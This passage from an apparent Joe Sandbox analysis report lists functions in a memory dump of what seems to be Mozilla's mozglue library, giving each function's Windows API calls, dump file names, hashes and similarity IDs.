                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 05b26c0f71cace539d614dbd5c3fb8dc160b54f8cd1d22ed105a81019b6d3b9a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54E04F7060D3459BEF805FA5E90A7613AFCEF2F208F70906AAA0F81A00D770C150CB50
                                                                                                                                                                                                                                                                                        Function 6C9CC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,?,6C9CC0E9), ref: 6C9CC418
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C9CC437
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,6C9CC0E9), ref: 6C9CC44C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                        • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                                                                                                                                                        • API String ID: 145871493-2623246514
                                                                                                                                                                                                                                                                                        • Opcode ID: b5216fae2a2ddbfcf51b0287a398eb430e31cd29c6f2a9eebf5006af68470c28
                                                                                                                                                                                                                                                                                        • Instruction ID: 8de510b7b099d4d3b1600f066ff9f9d8f0ef04224f423a890e86a7c329baae20
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5216fae2a2ddbfcf51b0287a398eb430e31cd29c6f2a9eebf5006af68470c28
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B9E0BF707093019BDF80BF71D9197117FF8AF6E20CF20919BAA06D1691DB74D4008B55
                                                                                                                                                                                                                                                                                        Function 6C9C75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,?,6C9C748B,?), ref: 6C9C75B8
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C9C75D7
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,6C9C748B,?), ref: 6C9C75EC
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                        • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                                                                                                                                                                                        • API String ID: 145871493-3641475894
                                                                                                                                                                                                                                                                                        • Opcode ID: 95bdfbab46e4575ef00fd30b4a770e0da2cd37c4057cbab5642d4f3a4cfb0352
                                                                                                                                                                                                                                                                                        • Instruction ID: bc68222c2a64df2fe013f30f43062b9311f633d8f8ace1ced19a7669815b4a71
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 95bdfbab46e4575ef00fd30b4a770e0da2cd37c4057cbab5642d4f3a4cfb0352
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3E04F70309301ABDF805FA3D8487053AF8EF6E64CF30442AA900C1602DB72C205CF45
                                                                                                                                                                                                                                                                                        Function 6C9C7600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,?,6C9C7592), ref: 6C9C7608
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C9C7627
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,6C9C7592), ref: 6C9C763C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                        • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                                                        • API String ID: 145871493-1050664331
                                                                                                                                                                                                                                                                                        • Opcode ID: 418749abab88748420c6ea846e4475d8778ad8ccb98e2f17ae3eba547ca934b8
                                                                                                                                                                                                                                                                                        • Instruction ID: 90c9da93e34062458f3bd1e676f4c0d51248532629542b4a153c8d366ec1daec
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 418749abab88748420c6ea846e4475d8778ad8ccb98e2f17ae3eba547ca934b8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4E04FB03093009BEF805FA7E8087013AB8EF7E75CF20401AE904C1701D772C0048F5A
                                                                                                                                                                                                                                                                                        Function 6C9CBE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,?,?,6C9CBE49), ref: 6C9CBEC4
                                                                                                                                                                                                                                                                                        • RtlCaptureStackBackTrace.NTDLL ref: 6C9CBEDE
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C9CBE49), ref: 6C9CBF38
                                                                                                                                                                                                                                                                                        • RtlReAllocateHeap.NTDLL ref: 6C9CBF83
                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 6C9CBFA6
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2764315370-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 68f51ba09ff7491461a0bf7c47db13069a798e283164e3a5b0dd8d84e9360002
                                                                                                                                                                                                                                                                                        • Instruction ID: c94d7027fb18e47adff1cc8c2ed3a31a0e48188dade373cecd5c82c7cedae1ff
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68f51ba09ff7491461a0bf7c47db13069a798e283164e3a5b0dd8d84e9360002
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB51AE71B002058FE710DF69C980BAAB7B6FF98314F298629D515A7B94D730F9168F82
                                                                                                                                                                                                                                                                                        Function 6C9B8E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C9AB58D,?,?,?,?,?,?,?,6C9DD734,?,?,?,6C9DD734), ref: 6C9B8E6E
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C9AB58D,?,?,?,?,?,?,?,6C9DD734,?,?,?,6C9DD734), ref: 6C9B8EBF
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,6C9AB58D,?,?,?,?,?,?,?,6C9DD734,?,?,?), ref: 6C9B8F24
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C9AB58D,?,?,?,?,?,?,?,6C9DD734,?,?,?,6C9DD734), ref: 6C9B8F46
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,6C9AB58D,?,?,?,?,?,?,?,6C9DD734,?,?,?), ref: 6C9B8F7A
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C9AB58D,?,?,?,?,?,?,?,6C9DD734,?,?,?), ref: 6C9B8F8F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: freemalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3061335427-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ce01fb82a7935a1c469e9293dcdf255e775d537d0de981acdcc31d044a615a78
                                                                                                                                                                                                                                                                                        • Instruction ID: 997c988fef9c425fc9a14a26dce0d82a55aca5fa4cc0e4d16343e4976a249008
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce01fb82a7935a1c469e9293dcdf255e775d537d0de981acdcc31d044a615a78
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C519DB1A012179FEB18CF64D8806AF77B6AF48308F25052AD916BB740E731E915CBA5
                                                                                                                                                                                                                                                                                        Function 6C9760E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C975FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C9760F4
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C975FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C976180
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,6C975FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C976211
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C975FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C976229
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,6C975FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C97625E
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C975FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C976271
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: freemalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3061335427-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b88ae09da805f42bba156cad7b2e25d7b7fb03d3514b05556760989bc4d1c2f5
                                                                                                                                                                                                                                                                                        • Instruction ID: 8e770e660e1bb8a2286f818cda1fa22e4efa62bf2526dc4db1f2d203c69ee70f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b88ae09da805f42bba156cad7b2e25d7b7fb03d3514b05556760989bc4d1c2f5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5851AFB1A062078FEB64CF68D8847AEB7B5EF55308F200439C656D7B11E731EA58CB61
                                                                                                                                                                                                                                                                                        Function 6C9B27E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C9B2620,?,?,?,6C9A60AA,6C9A5FCB,6C9A79A3), ref: 6C9B284D
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C9B2620,?,?,?,6C9A60AA,6C9A5FCB,6C9A79A3), ref: 6C9B289A
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,6C9B2620,?,?,?,6C9A60AA,6C9A5FCB,6C9A79A3), ref: 6C9B28F1
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C9B2620,?,?,?,6C9A60AA,6C9A5FCB,6C9A79A3), ref: 6C9B2910
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000001,?,?,6C9B2620,?,?,?,6C9A60AA,6C9A5FCB,6C9A79A3), ref: 6C9B293C
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C9B2620,?,?,?,6C9A60AA,6C9A5FCB,6C9A79A3), ref: 6C9B294E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: freemalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3061335427-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c34cb5a894b9a67dd1968f93d54790a4a6e4ac3e9d5011dd3a55dcc48a6ec919
                                                                                                                                                                                                                                                                                        • Instruction ID: aefe4406774c7c74236b563b2abb29ad46d52638af37982b7f9776e172ef4c2e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c34cb5a894b9a67dd1968f93d54790a4a6e4ac3e9d5011dd3a55dcc48a6ec919
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8541C0B1A046069FEB14CF68D98476B77FAEF45308F240939D56AEB740E731E904CBA1
                                                                                                                                                                                                                                                                                        Function 6C96CFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EE784), ref: 6C96CFF6
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EE784), ref: 6C96D026
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C96D06C
                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C96D139
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                                                                                                                                                                                                                                                        • String ID: MOZ_CRASH()
                                                                                                                                                                                                                                                                                        • API String ID: 1090480015-2608361144
                                                                                                                                                                                                                                                                                        • Opcode ID: 97cfd38d9f73e9feb3087f8a9428780c2868546f2e60a5c3514d10e730178775
                                                                                                                                                                                                                                                                                        • Instruction ID: b827a1aab447cafece951804a28b06dd9090a023e854f25fb6b002e3cd707054
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97cfd38d9f73e9feb3087f8a9428780c2868546f2e60a5c3514d10e730178775
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F41C032B053168FDB548E6E8D9036A36B4EF6DB14F350139E968E7BC4D7A298008BC4
                                                                                                                                                                                                                                                                                        Function 6C964DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C964E5A
                                                                                                                                                                                                                                                                                        • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C964E97
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C964EE9
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C964F02
                                                                                                                                                                                                                                                                                        • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C964F1E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 713647276-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 745385378f90920dbf91c1a62db068cc0e8b6bd95d8ea0245158b7e5d15da9a1
                                                                                                                                                                                                                                                                                        • Instruction ID: a09de3c7e85f01e70f78299b8c8b463ee06a279a972c51574fa6993e6aa33c9c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 745385378f90920dbf91c1a62db068cc0e8b6bd95d8ea0245158b7e5d15da9a1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3641BF71608701DFD705CFAAC49095BB7E8BF99344F108A2DF46597B81DB30E958CB92
                                                                                                                                                                                                                                                                                        Function 6C971530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(-00000002,?,6C97152B,?,?,?,?,6C971248,?), ref: 6C97159C
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C97152B,?,?,?,?,6C971248,?), ref: 6C9715BC
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(-00000001,?,6C97152B,?,?,?,?,6C971248,?), ref: 6C9715E7
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,6C97152B,?,?,?,?,6C971248,?), ref: 6C971606
                                                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C97152B,?,?,?,?,6C971248,?), ref: 6C971637
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 733145618-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5e294355a2d66e555a507a94e19bcac8503998dc2067d7fe8ff026e608bffb69
                                                                                                                                                                                                                                                                                        • Instruction ID: a0785a1095495bd582060f3a2fa357e1915c2affc6771ed56e9ef618b47b6764
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e294355a2d66e555a507a94e19bcac8503998dc2067d7fe8ff026e608bffb69
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44310872A011058BCB2C8E78D86147E77B9BB923647350B2DE427DBBD4EB30D90487A1
                                                                                                                                                                                                                                                                                        Function 6C9CAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C9DE330,?,6C98C059), ref: 6C9CAD9D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97CA10: malloc.MOZGLUE(?), ref: 6C97CA26
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C9DE330,?,6C98C059), ref: 6C9CADAC
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,00000000,?,?,6C9DE330,?,6C98C059), ref: 6C9CAE01
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,6C9DE330,?,6C98C059), ref: 6C9CAE1D
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C9DE330,?,6C98C059), ref: 6C9CAE3D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
